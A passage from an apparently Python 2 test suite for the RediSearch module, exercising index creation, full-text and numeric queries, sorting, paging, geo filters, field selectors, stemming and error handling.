# expected = ['INTERSECT {', ' UNION {', ' hello', ' <HL(expanded)', ' +hello(expanded)', ' }', ' UNION {', ' world', ' <ARLT(expanded)', ' +world(expanded)', ' }', ' EXACT {', ' what', ' what', ' }', ' UNION {', ' UNION {', ' hello', ' <HL(expanded)', ' +hello(expanded)', ' }', ' UNION {', ' world', ' <ARLT(expanded)', ' +world(expanded)', ' }', ' }', ' UNION {', ' NUMERIC {10.000000 <= @bar <= 100.000000}', ' NUMERIC {200.000000 <= @bar <= 300.000000}', ' }', '}', '']
if env.is_cluster():
raise unittest.SkipTest()
res = env.cmd('ft.explainCli', 'idx', q)
expected = ['INTERSECT {', ' UNION {', ' hello', ' +hello(expanded)', ' }', ' UNION {', ' world', ' +world(expanded)', ' }', ' EXACT {', ' what', ' what', ' }', ' UNION {', ' UNION {', ' hello', ' +hello(expanded)', ' }', ' UNION {', ' world', ' +world(expanded)', ' }', ' }', ' UNION {', ' NUMERIC {10.000000 <= @bar <= 100.000000}', ' NUMERIC {200.000000 <= @bar <= 300.000000}', ' }', '}', '']
env.assertEqual(expected, res)
def testNoIndex(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema',
'foo', 'text',
'num', 'numeric', 'sortable', 'noindex',
'extra', 'text', 'noindex', 'sortable'))
if not env.isCluster():
# to specific check on cluster, todo : change it to be generic enough
res = env.cmd('ft.info', 'idx')
env.assertEqual(res[5][1][4], 'NOINDEX')
env.assertEqual(res[5][2][6], 'NOINDEX')
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'fields',
'foo', 'hello world', 'num', 1, 'extra', 'hello lorem ipsum'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertListEqual([1, 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'lorem ipsum', 'nocontent')
env.assertListEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', '@extra:hello', 'nocontent')
env.assertListEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', '@num:[1 1]', 'nocontent')
env.assertListEqual([0], res)
def testPartial(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema',
'foo', 'text',
'num', 'numeric', 'sortable', 'noindex',
'extra', 'text', 'noindex'))
# print r.execute_command('ft.info', 'idx')
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'fields',
'foo', 'hello world', 'num', 1, 'extra', 'lorem ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', '0.1', 'fields',
'foo', 'hello world', 'num', 2, 'extra', 'abba'))
res = r.execute_command('ft.search', 'idx', 'hello world',
'sortby', 'num', 'asc', 'nocontent', 'withsortkeys')
env.assertListEqual([2L, 'doc1', '#1', 'doc2', '#2'], res)
res = r.execute_command('ft.search', 'idx', 'hello world',
'sortby', 'num', 'desc', 'nocontent', 'withsortkeys')
env.assertListEqual([2L, 'doc2', '#2', 'doc1', '#1'], res)
# Updating non indexed fields doesn't affect search results
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'replace', 'partial',
'fields', 'num', 3, 'extra', 'jorem gipsum'))
env.expect('ft.add', 'idx', 'doc12', '0.1', 'replace', 'partial',
'fields', 'num1', 'redis').equal('OK')
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'sortby', 'num', 'desc',)
assertResultsEqual(env, [2L, 'doc1', ['foo', 'hello world', 'num', '3', 'extra', 'jorem gipsum'],
'doc2', ['foo', 'hello world', 'num', '2', 'extra', 'abba']], res)
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'withscores')
# Updating only indexed field affects search results
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'replace', 'partial',
'fields', 'foo', 'wat wet'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertListEqual([1L, 'doc2'], res)
res = r.execute_command('ft.search', 'idx', 'wat', 'nocontent')
env.assertListEqual([1L, 'doc1'], res)
# Test updating of score and no fields
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withscores')
env.assertLess(float(res[2]), 1)
# env.assertListEqual([1L, 'doc1'], res)
env.assertOk(r.execute_command('ft.add', 'idx',
'doc1', '1.0', 'replace', 'partial', 'fields'))
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withscores')
env.assertGreater(float(res[2]), 1)
# Test updating payloads
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withpayloads')
env.assertIsNone(res[2])
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '1.0',
'replace', 'partial', 'payload', 'foobar', 'fields'))
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withpayloads')
env.assertEqual('foobar', res[2])
def testPaging(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', '%d' % i, 1, 'fields',
'foo', 'hello', 'bar', i))
chunk = 7
offset = 0
while True:
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'sortby', 'bar', 'desc', 'limit', offset, chunk)
env.assertEqual(res[0], N)
if offset + chunk > N:
env.assertTrue(len(res) - 1 <= chunk)
break
env.assertEqual(len(res), chunk + 1)
for n, id in enumerate(res[1:]):
env.assertEqual(int(id), N - 1 - (offset + n))
offset += chunk
chunk = random.randrange(1, 10)
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'sortby', 'bar', 'asc', 'limit', N, 10)
env.assertEqual(res[0], N)
env.assertEqual(len(res), 1)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, -1)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', -1, 10)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 2000000)
def testPrefix(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'constant term%d' % (random.randrange(0, 5))))
for _ in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'constant term', 'nocontent')
env.assertEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', 'constant term*', 'nocontent')
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'const* term*', 'nocontent')
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'constant term1*', 'nocontent')
env.assertGreater(res[0], 2)
res = r.execute_command(
'ft.search', 'idx', 'const* -term*', 'nocontent')
env.assertEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', 'constant term9*', 'nocontent')
env.assertEqual([0], res)
def testSortBy(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'sortable', 'bar', 'numeric', 'sortable'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello%03d world' % i, 'bar', 100 - i))
for _ in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'foo')
env.assertEqual([100L, 'doc0', 'doc1', 'doc2', 'doc3',
'doc4', 'doc5', 'doc6', 'doc7', 'doc8', 'doc9'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'foo', 'desc')
env.assertEqual([100L, 'doc99', 'doc98', 'doc97', 'doc96',
'doc95', 'doc94', 'doc93', 'doc92', 'doc91', 'doc90'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'bar', 'desc')
env.assertEqual([100L, 'doc0', 'doc1', 'doc2', 'doc3',
'doc4', 'doc5', 'doc6', 'doc7', 'doc8', 'doc9'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'bar', 'asc')
env.assertEqual([100L, 'doc99', 'doc98', 'doc97', 'doc96',
'doc95', 'doc94', 'doc93', 'doc92', 'doc91', 'doc90'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'bar', 'desc', 'withscores', 'limit', '2', '5')
env.assertEqual(
[100L, 'doc2', '0', 'doc3', '0', 'doc4', '0', 'doc5', '0', 'doc6', '0'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'bar', 'desc', 'withsortkeys', 'limit', 0, 5)
env.assertListEqual(
[100L, 'doc0', '#100', 'doc1', '#99', 'doc2', '#98', 'doc3', '#97', 'doc4', '#96'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'foo', 'desc', 'withsortkeys', 'limit', 0, 5)
env.assertListEqual([100L, 'doc99', '$hello099 world', 'doc98', '$hello098 world', 'doc97', '$hello097 world', 'doc96',
'$hello096 world', 'doc95', '$hello095 world'], res)
def testNot(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
N = 10
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'constant term%d' % (random.randrange(0, 5))))
for i in range(5):
inclusive = r.execute_command(
'ft.search', 'idx', 'constant term%d' % i, 'nocontent', 'limit', 0, N)
exclusive = r.execute_command(
'ft.search', 'idx', 'constant -term%d' % i, 'nocontent', 'limit', 0, N)
exclusive2 = r.execute_command(
'ft.search', 'idx', '-(term%d)' % i, 'nocontent', 'limit', 0, N)
exclusive3 = r.execute_command(
'ft.search', 'idx', '(-term%d) (constant)' % i, 'nocontent', 'limit', 0, N)
env.assertNotEqual(inclusive[0], N)
env.assertEqual(inclusive[0] + exclusive[0], N)
env.assertEqual(exclusive3[0], exclusive2[0])
env.assertEqual(exclusive3[0], exclusive[0])
s1, s2, s3, s4 = set(inclusive[1:]), set(
exclusive[1:]), set(exclusive2[1:]), set(exclusive3[1:])
env.assertTrue(s1.difference(s2) == s1)
env.assertTrue(s1.difference(s3) == s1)
env.assertTrue(s1.difference(s4) == s1)
env.assertTrue(s2 == s3)
env.assertTrue(s2 == s4)
env.assertTrue(s2.intersection(s1) == set())
env.assertTrue(s3.intersection(s1) == set())
env.assertTrue(s4.intersection(s1) == set())
# NOT on a non existing term
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -dasdfasdf', 'nocontent')[0], N)
# not on env term
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -constant', 'nocontent'), [0])
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -(term0|term1|term2|term3|term4|nothing)', 'nocontent'), [0])
# env.assertEqual(r.execute_command('ft.search', 'idx', 'constant -(term1 term2)', 'nocontent')[0], N)
def testNestedIntersection(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'a', 'text', 'b', 'text', 'c', 'text', 'd', 'text'))
for i in range(20):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'a', 'foo', 'b', 'bar', 'c', 'baz', 'd', 'gaz'))
res = [
r.execute_command('ft.search', 'idx',
'foo bar baz gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@a:foo @b:bar @c:baz @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@b:bar @a:foo @c:baz @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@c:baz @b:bar @a:foo @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@d:gaz @c:baz @b:bar @a:foo', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@a:foo (@b:bar (@c:baz @d:gaz))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@c:baz (@a:foo (@b:bar (@c:baz @d:gaz)))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@b:bar (@a:foo (@c:baz @d:gaz))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@d:gaz (@a:foo (@c:baz @b:bar))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (bar baz gaz)', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (bar (baz gaz))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (bar (foo bar) (foo bar))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (foo (bar baz (gaz)))', 'nocontent'),
r.execute_command('ft.search', 'idx', 'foo (foo (bar (baz (gaz (foo bar (gaz))))))', 'nocontent')]
for i, r in enumerate(res):
# print i, res[0], r
env.assertListEqual(res[0], r)
def testInKeys(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
for i in range(200):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello world'))
for _ in r.retry_with_rdb_reload():
for keys in (
['doc%d' % i for i in range(10)], ['doc%d' % i for i in range(0, 30, 2)], [
'doc%d' % i for i in range(99, 0, -5)]
):
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'NOCONTENT', 'LIMIT', 0, 100, 'INKEYS', len(keys), *keys)
env.assertEqual(len(keys), res[0])
env.assertTrue(all((k in res for k in keys)))
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 'hello world', 'NOCONTENT', 'LIMIT', 0, 100, 'INKEYS', 3, 'foo', 'bar', 'baz')[0])
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'INKEYS', 99)
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'INKEYS', -1)
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'inkeys', 4, 'foo')
def testSlopInOrder(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1, 'fields',
'title', 't1 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1, 'fields',
'title', 't1 t3 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc3', 1, 'fields',
'title', 't1 t3 t4 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc4', 1, 'fields',
'title', 't1 t3 t4 t5 t2'))
res = r.execute_command(
'ft.search', 'idx', 't1|t4 t3|t2', 'slop', '0', 'inorder', 'nocontent')
env.assertEqual({'doc3', 'doc4', 'doc2', 'doc1'}, set(res[1:]))
res = r.execute_command(
'ft.search', 'idx', 't2 t1', 'slop', '0', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc1', res[1])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't2 t1', 'slop', '0', 'inorder')[0])
env.assertEqual(1, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '0', 'inorder')[0])
env.assertEqual(2, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '1', 'inorder')[0])
env.assertEqual(3, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '2', 'inorder')[0])
env.assertEqual(4, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '3', 'inorder')[0])
env.assertEqual(4, r.execute_command(
'ft.search', 'idx', 't1 t2', 'inorder')[0])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't t1', 'inorder')[0])
env.assertEqual(2, r.execute_command(
'ft.search', 'idx', 't1 t2 t3 t4')[0])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't1 t2 t3 t4', 'inorder')[0])
def testExact(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'weight', 10.0, 'body', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello world',
'body', 'lorem ist ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello another world',
'body', 'lorem ist ipsum lorem lorem'))
res = r.execute_command(
'ft.search', 'idx', '"hello world"', 'verbatim')
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
res = r.execute_command(
'ft.search', 'idx', "hello \"another world\"", 'verbatim')
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
def testGeoErrors(env):
env.expect('flushall')
env.expect('ft.create idx schema name text location geo').equal('OK')
env.expect('ft.add idx hotel 1.0 fields name hill location -0.1757,51.5156').equal('OK')
env.expect('ft.search idx hilton geofilter location -0.1757 51.5156 1 km').equal([0L])
# Insert error
env.expect('ft.add', 'idx', 'hotel1', 1, 'fields', 'name', '_hotel1', 'location', '1, 1').error() \
.contains('Could not index geo value')
# Query errors
env.expect('ft.search idx hilton geofilter location lon 51.5156 1 km').error() \
.contains('Bad arguments for <lon>: Could not convert argument to expected type')
env.expect('ft.search idx hilton geofilter location 51.5156 lat 1 km').error() \
.contains('Bad arguments for <lat>: Could not convert argument to expected type')
env.expect('ft.search idx hilton geofilter location -0.1757 51.5156 radius km').error() \
.contains('Bad arguments for <radius>: Could not convert argument to expected type')
env.expect('ft.search idx hilton geofilter location -0.1757 51.5156 1 fake').error() \
.contains('Unknown distance unit fake')
env.expect('ft.search idx hilton geofilter location -0.1757 51.5156 1').error() \
.contains('GEOFILTER requires 5 arguments')
if not env.isCluster():
env.expect('flushall')
env.expect('set geo:idx/location foo').equal('OK')
env.expect('ft.create idx schema name text location geo').equal('OK')
env.expect('ft.add idx hotel 1.0 fields name hill location -0.1757,51.5156').error() \
.contains('Could not index geo value')
def testGeo(env):
r = env
gsearch = lambda query, lon, lat, dist, unit='km': r.execute_command(
'ft.search', 'idx', query, 'geofilter', 'location', lon, lat, dist, unit)
gsearch_inline = lambda query, lon, lat, dist, unit='km': r.execute_command(
'ft.search', 'idx', '{} @location:[{} {} {} {}]'.format(query, lon, lat, dist, unit))
env.assertOk(r.execute_command('ft.create', 'idx',
'schema', 'name', 'text', 'location', 'geo'))
for i, hotel in enumerate(hotels):
env.assertOk(r.execute_command('ft.add', 'idx', 'hotel{}'.format(i), 1.0, 'fields', 'name',
hotel[0], 'location', '{},{}'.format(hotel[2], hotel[1])))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.search', 'idx', 'hilton')
env.assertEqual(len(hotels), res[0])
res = gsearch('hilton', "-0.1757", "51.5156", '1')
print res
env.assertEqual(3, res[0])
env.assertEqual('hotel2', res[5])
env.assertEqual('hotel21', res[3])
env.assertEqual('hotel79', res[1])
res2 = gsearch_inline('hilton', "-0.1757", "51.5156", '1')
env.assertListEqual(res, res2)
res = gsearch('hilton', "-0.1757", "51.5156", '10')
env.assertEqual(14, res[0])
env.assertEqual('hotel93', res[1])
env.assertEqual('hotel92', res[3])
env.assertEqual('hotel79', res[5])
res2 = gsearch('hilton', "-0.1757", "51.5156", '10000', 'm')
env.assertListEqual(res, res2)
res2 = gsearch_inline('hilton', "-0.1757", "51.5156", '10')
env.assertListEqual(res, res2)
res = gsearch('heathrow', -0.44155, 51.45865, '10', 'm')
env.assertEqual(1, res[0])
env.assertEqual('hotel94', res[1])
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '10', 'm')
env.assertListEqual(res, res2)
res = gsearch('heathrow', -0.44155, 51.45865, '10', 'km')
env.assertEqual(5, res[0])
env.assertIn('hotel94', res)
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '10', 'km')
env.assertListEqual(res, res2)
res = gsearch('heathrow', -0.44155, 51.45865, '5', 'km')
env.assertEqual(3, res[0])
env.assertIn('hotel94', res)
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '5', 'km')
env.assertListEqual(res, res2)
def testTagErrors(env):
env.expect("ft.create", "test", "SCHEMA", "tags", "TAG").equal('OK')
env.expect("ft.add", "test", "1", "1", "FIELDS", "tags", "alberta").equal('OK')
env.expect("ft.add", "test", "2", "1", "FIELDS", "tags", "ontario. alberta").equal('OK')
def testGeoDeletion(env):
if env.is_cluster():
raise unittest.SkipTest()
# Can't properly test if deleted on cluster
env.cmd('ft.create', 'idx', 'schema',
'g1', 'geo', 'g2', 'geo', 't1', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields',
'g1', "-0.1757,51.5156",
'g2', "-0.1757,51.5156",
't1', "hello")
env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields',
'g1', "-0.1757,51.5156",
'g2', "-0.1757,51.5156",
't1', "hello")
# keys are: "geo:idx/g1" and "geo:idx/g2"
env.assertEqual(2, env.cmd('zcard', 'geo:idx/g1'))
env.assertEqual(2, env.cmd('zcard', 'geo:idx/g2'))
# Remove the first doc
env.cmd('ft.del', 'idx', 'doc1')
env.assertEqual(1, env.cmd('zcard', 'geo:idx/g1'))
env.assertEqual(1, env.cmd('zcard', 'geo:idx/g2'))
# Replace the other one:
env.cmd('ft.add', 'idx', 'doc2', 1.0,
'replace', 'fields',
't1', 'just text here')
env.assertEqual(0, env.cmd('zcard', 'geo:idx/g1'))
env.assertEqual(0, env.cmd('zcard', 'geo:idx/g2'))
def testAddHash(env):
if env.is_cluster():
raise unittest.SkipTest()
r = env
env.assertOk(r.execute_command('ft.create', 'idx', 'schema',
'title', 'text', 'weight', 10.0, 'body', 'text', 'price', 'numeric'))
env.assertTrue(
r.hmset('doc1', {"title": "hello world", "body": "lorem ipsum", "price": 2}))
env.assertTrue(
r.hmset('doc2', {"title": "hello werld", "body": "lorem ipsum", "price": 5}))
env.assertOk(r.execute_command('ft.addhash', 'idx', 'doc1', 1.0))
env.assertOk(r.execute_command('ft.addhash', 'idx', 'doc2', 1.0))
env.expect('ft.addhash', 'idx', 'doc3', 1.0, 1.0).error().contains('Unknown keyword: `1.0`')
res = r.execute_command('ft.search', 'idx', "hello", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc1", res[2])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx',
"hello",
"filter", "price", "0", "3"
)
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
env.assertListEqual(
['body', 'lorem ipsum', 'price', '2', 'title', 'hello world'], res[2])
res = r.execute_command(
'ft.search', 'idx', "hello werld", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
def testSafeAddHash(env):
if env.is_cluster():
raise unittest.SkipTest()
r = env
env.assertOk(r.execute_command('ft.create', 'idx', 'schema',
'title', 'text', 'weight', 10.0, 'body', 'text', 'price', 'numeric'))
env.assertTrue(
r.hmset('doc1', {"title": "hello world", "body": "lorem ipsum", "price": 2}))
env.assertTrue(
r.hmset('doc2', {"title": "hello werld", "body": "lorem ipsum", "price": 5}))
env.expect('ft.safeaddhash idx doc1 1.0').equal('OK')
env.expect('ft.safeaddhash idx doc2 1.0').equal('OK')
env.expect('ft.safeaddhash idx').error().contains("wrong number of arguments for 'ft.safeaddhash' command")
env.expect('ft.safeaddhash idx doc3 2.0').error().contains('Score must be between 0 and 1')
env.expect('ft.safeaddhash idx doc3 -2.0').error().contains('Score must be between 0 and 1')
env.expect('ft.safeaddhash idx doc3 1.0 1.0').error().contains('Unknown keyword: `1.0`')
env.expect('ft.safeaddhash idx doc3 not_a_number').error().contains('Could not parse document score')
env.expect('ft.safeaddhash idx doc3 1.0 LANGUAGE RediSearch').error().contains('Unknown language: `RediSearch`')
env.expect('ft.safeaddhash idx doc3 1.0 LANGUAGE RediSearch not_an_arg').error().contains("Unknown keyword: `not_an_arg`")
#env.expect('ft.safeaddhash', 'idx', 'doc3', '1.0', 'LANGUAGE', 'RediSearch, ""').error().contains("Error parsing arguments for `%s`: %s")
env.expect('ft.safeaddhash not_idx doc3 1.0').error().contains('Unknown Index name')
res = r.execute_command('ft.search', 'idx', "hello", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc1", res[2])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx',
"hello",
"filter", "price", "0", "3"
)
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
env.assertListEqual(
['body', 'lorem ipsum', 'price', '2', 'title', 'hello world'], res[2])
res = r.execute_command(
'ft.search', 'idx', "hello werld", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
def testInfields(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'weight', 10.0, 'body', 'text', 'weight', 1.0))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello world',
'body', 'lorem ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello world lorem ipsum',
'body', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'verbatim', "infields", 1, "title", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc2", res[1])
env.assertEqual("doc1", res[2])
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', 'hello', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', '\"hello world\"', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', '\"lorem ipsum\"', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
res = r.execute_command(
'ft.search', 'idx', 'lorem ipsum', "infields", 2, "body", "title", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc2", res[1])
env.assertEqual("doc1", res[2])
def testScorerSelection(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'body', 'text'))
# this is the default scorer
res = r.execute_command(
'ft.search', 'idx', 'foo', 'scorer', 'TFIDF')
env.assertEqual(res, [0])
with env.assertResponseError():
res = r.execute_command(
'ft.search', 'idx', 'foo', 'scorer', 'NOSUCHSCORER')
def testFieldSelectors(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'TiTle', 'text', 'BoDy', 'text', "יוניקוד", 'text', 'field.with,punct', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1, 'fields',
'title', 'hello world', 'body', 'foo bar', 'יוניקוד', 'unicode', 'field.with,punct', 'punt'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 0.5, 'fields',
'body', 'hello world', 'title', 'foo bar', 'יוניקוד', 'unicode', 'field.with,punct', 'punt'))
res = r.execute_command(
'ft.search', 'idx', '@title:hello world', 'nocontent')
env.assertEqual(res, [1, 'doc1'])
res = r.execute_command(
'ft.search', 'idx', '@body:hello world', 'nocontent')
env.assertEqual(res, [1, 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@body:hello @title:world', 'nocontent')
env.assertEqual(res, [0])
res = r.execute_command(
'ft.search', 'idx', '@body:hello world @title:world', 'nocontent')
env.assertEqual(res, [0])
res = r.execute_command(
'ft.search', 'idx', '@BoDy:(hello|foo) @Title:(world|bar)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@body:(hello|foo world|bar)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@body|title:(hello world)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@יוניקוד:(unicode)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@field\\.with\\,punct:(punt)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
def testStemming(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello kitty'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello kitties'))
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent", "verbatim")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
# test for unknown language
with env.assertResponseError():
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent", "language", "foofoofian")
def testExpander(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello kitty'))
res = r.execute_command(
'ft.search', 'idx', 'kitties',
"nocontent",
"expander", "SBSTEM"
)
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitties', "nocontent", "expander", "noexpander")
env.assertEqual(1, len(res))
env.assertEqual(0, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitti', "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitti', "nocontent", 'verbatim')
env.assertEqual(1, len(res))
env.assertEqual(0, res[0])
